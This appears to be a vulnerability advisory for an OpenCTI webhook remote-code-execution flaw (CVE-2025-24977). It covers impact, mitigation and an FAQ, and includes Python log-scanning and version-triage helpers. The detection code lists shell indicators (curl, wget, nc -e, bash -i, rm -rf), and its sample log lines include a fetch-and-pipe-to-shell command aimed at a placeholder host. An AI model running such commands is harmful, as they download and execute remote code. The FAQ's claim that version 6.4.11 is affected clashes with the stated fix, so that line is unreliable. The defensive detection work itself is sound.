Fixed version
6.4.12
6.4.11
CVE-2025-24977 is a remote code execution (RCE) vulnerability affecting OpenCTI, an open cyber threat intelligence (CTI) platform. An attacker with the 'manage customizations' capability can execute arbitrary commands on the underlying infrastructure and access sensitive server-side secrets. This vulnerability impacts versions of OpenCTI prior to 6.4.11 and has been resolved in version 6.4.11.
The impact of CVE-2025-24977 is severe. A successful exploit allows an attacker to gain a root shell within the OpenCTI container, effectively granting them complete control over the underlying infrastructure. This includes the ability to read and modify sensitive data, install malware, and potentially pivot to other systems within the network. The exposure of internal server-side secrets further amplifies the risk, potentially providing credentials or configuration details that can be leveraged for broader attacks. This vulnerability resembles scenarios where container escape vulnerabilities are exploited to compromise the host system.
CVE-2025-24977 was publicly disclosed on May 5, 2025. The vulnerability's criticality (CVSS 9.1) and the potential for significant impact suggest a high probability of exploitation. No public proof-of-concept (PoC) code has been released as of this writing, but the ease of exploitation once access to the 'manage customizations' role has been obtained makes it a likely target for exploitation. It is not currently listed on the CISA KEV catalog.
Organizations utilizing OpenCTI for threat intelligence management are at risk, particularly those with lax access controls or shared hosting environments. Deployment patterns where multiple users have elevated privileges within OpenCTI increase the potential attack surface. Legacy OpenCTI installations that have not been regularly patched are also particularly vulnerable.
• python: Monitor OpenCTI logs for unusual command execution attempts, particularly those originating from webhook requests.

    # Example: Check for suspicious commands in OpenCTI logs
    import re

    # Shell indicators that should not appear in webhook processing output
    PATTERN = re.compile(r'command:.*(rm -rf|wget|curl)')

    with open('opencti.log', 'r') as f:
        for line in f:
            if PATTERN.search(line):
                print(f'Suspicious command detected: {line.rstrip()}')

• linux / server: Use journalctl to filter for errors or warnings related to OpenCTI's webhook processing. journalctl takes a single --grep pattern (a second --grep replaces the first rather than combining with it), so apply the second filter with grep:

    journalctl -u opencti -f --grep 'webhook' | grep -iE 'error|warn'

• generic web: Monitor access logs for unusual patterns of requests to OpenCTI webhook endpoints. Look for requests with unexpected parameters or payloads.
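The detection guidance above amounts to "look for shell indicators in webhook-related log lines". The following is an added example written for this page, not code from OpenCTI or from the advisory's author. It assumes a JSON-lines log layout with message, category and level fields (OpenCTI's real field names may differ) and falls back to plain text; the sample log lines and the indicator list are constructed for the demonstration.

```python
"""Hypothetical detection helper: flag webhook-related log lines that carry
shell-command indicators. Log layout and field names are assumed, and the
sample lines are constructed; none of this is OpenCTI's own code or output."""
import json
import re
from typing import Dict, Iterable, List

# Indicators a defender would not expect inside webhook-processing logs.
# Constructed starting list; extend it for your environment.
SUSPICIOUS = re.compile(
    r"\b(rm\s+-rf|wget|curl|nc\s+-e|bash\s+-i|/bin/sh|child_process|exec\()",
    re.IGNORECASE,
)
# Only lines that mention webhook processing are in scope for this check.
WEBHOOK_HINT = re.compile(r"webhook", re.IGNORECASE)


def parse_line(raw: str) -> Dict[str, str]:
    """Accept a JSON-lines record (assumed layout) or plain text; return a uniform dict."""
    raw = raw.strip()
    try:
        obj = json.loads(raw)
        if isinstance(obj, dict):
            return {
                "message": str(obj.get("message", raw)),
                "category": str(obj.get("category", "")),
                "level": str(obj.get("level", "")),
                "raw": raw,
            }
    except ValueError:
        pass  # not JSON: treat the whole line as the message
    return {"message": raw, "category": "", "level": "", "raw": raw}


def find_suspicious(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return parsed entries that are webhook-related AND contain a shell indicator."""
    hits = []
    for raw in lines:
        if not raw.strip():
            continue
        entry = parse_line(raw)
        # Webhook context is checked on the whole record (category, message, ...),
        # the indicator only on the message text.
        if not WEBHOOK_HINT.search(entry["raw"]):
            continue
        match = SUSPICIOUS.search(entry["message"])
        if match:
            entry["indicator"] = match.group(0)
            hits.append(entry)
    return hits


# Constructed sample log lines (not real OpenCTI output).
SAMPLE_LOG = [
    '{"category":"APP","level":"info","message":"Webhook notification sent","timestamp":"2025-05-06T10:00:00Z"}',
    '{"category":"APP","level":"error","message":"Webhook template error: curl http://example.invalid/x | sh"}',
    "plain text line: webhook template evaluated command: rm -rf /tmp/x",
    '{"category":"APP","level":"info","message":"User logged in"}',
    "command: wget http://example.invalid/tool from unrelated connector",
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"[{hit['level'] or 'n/a'}] indicator={hit['indicator']!r}: {hit['message']}")
```

Run against the constructed sample, the helper reports the two webhook-related lines carrying curl and rm -rf and ignores the wget line, which has no webhook context. Feeding it `opencti.log` line by line, or the output of the journalctl command above, is the intended use; tune WEBHOOK_HINT to the category your deployment actually logs.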
disclosure
Exploit status
EPSS: 0.53% (67th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2025-24977 is to immediately upgrade OpenCTI to version 6.4.11 or later. If upgrading is not immediately feasible, restrict access to the 'manage customizations' capability to only trusted users. Consider implementing network segmentation to limit the potential blast radius of a successful exploit. While a WAF or proxy cannot directly prevent this vulnerability, it can help detect and block suspicious command execution attempts. After upgrading, verify the fix by attempting to execute a command via the webhooks functionality with a user lacking elevated privileges; the command should be rejected.
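The first triage step the mitigation above implies is deciding whether an installed release predates 6.4.11. The helper below is an added example for this page, not OpenCTI code: it compares version strings numerically rather than lexically (where "6.4.9" sorts after "6.4.11") and treats pre-release tags as older than the final release. The version strings it is run on are constructed inputs; the fixed version comes from the advisory.

```python
"""Hypothetical version-triage helper for CVE-2025-24977. Not OpenCTI code;
the fixed version is the one the advisory names, the inputs are constructed."""
import re
from typing import Tuple

FIXED_VERSION = "6.4.11"  # release that contains the fix, per the advisory

_VERSION_RE = re.compile(r"v?(\d+(?:\.\d+)*)(-[0-9A-Za-z.]+)?$")


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn '6.4.11', 'v6.4.11' or '6.4.11-rc1' into a comparable tuple.

    The numeric core becomes integers; a trailing element marks whether the
    string is a final release (1) or a pre-release (0), so '6.4.11-rc1'
    sorts before '6.4.11' and is therefore still reported as affected."""
    m = _VERSION_RE.match(v.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {v!r}")
    core = tuple(int(part) for part in m.group(1).split("."))
    return core + (0 if m.group(2) else 1,)


def is_affected(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed release predates the fix.

    Tuple comparison avoids the string-sort pitfall where '6.4.9' > '6.4.11'."""
    return parse_version(installed) < parse_version(fixed)


def triage(installed: str) -> str:
    """One-line recommendation a responder can paste into a ticket."""
    if is_affected(installed):
        return (
            f"OpenCTI {installed} is affected by CVE-2025-24977: upgrade to "
            f"{FIXED_VERSION} or later; until then restrict the 'manage "
            f"customizations' capability to trusted users."
        )
    return f"OpenCTI {installed} already includes the fix ({FIXED_VERSION})."


if __name__ == "__main__":
    # Constructed inputs covering the edge cases the comparison must handle.
    for v in ("6.4.9", "6.4.10", "6.4.11", "6.4.12", "v6.3.0-rc1", "6.4.11-rc1"):
        print(triage(v))
```

Pair the result with the access-control step: even on an upgraded instance, the list of accounts holding 'manage customizations' is worth reviewing, since that capability is the precondition the advisory describes.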
Upgrade OpenCTI to version 6.4.11 or later. This version fixes the remote code execution and sensitive-secret exposure vulnerability via webhooks. The update will prevent malicious users with customization-management privileges from executing commands on the server and accessing confidential information.
CVE-2025-24977 is a critical remote code execution vulnerability in OpenCTI versions prior to 6.4.11, allowing attackers with 'manage customizations' to execute commands and access server secrets.
You are affected if you are running OpenCTI version 6.4.11 or earlier. Immediately check your version and upgrade if necessary.
Upgrade OpenCTI to version 6.4.11 or later. Restrict access to the 'manage customizations' role to trusted users only.
While no public exploits are currently known, the vulnerability's severity and ease of exploitation suggest a high probability of future exploitation.
Refer to the official OpenCTI security advisory on their website or GitHub repository for detailed information and updates.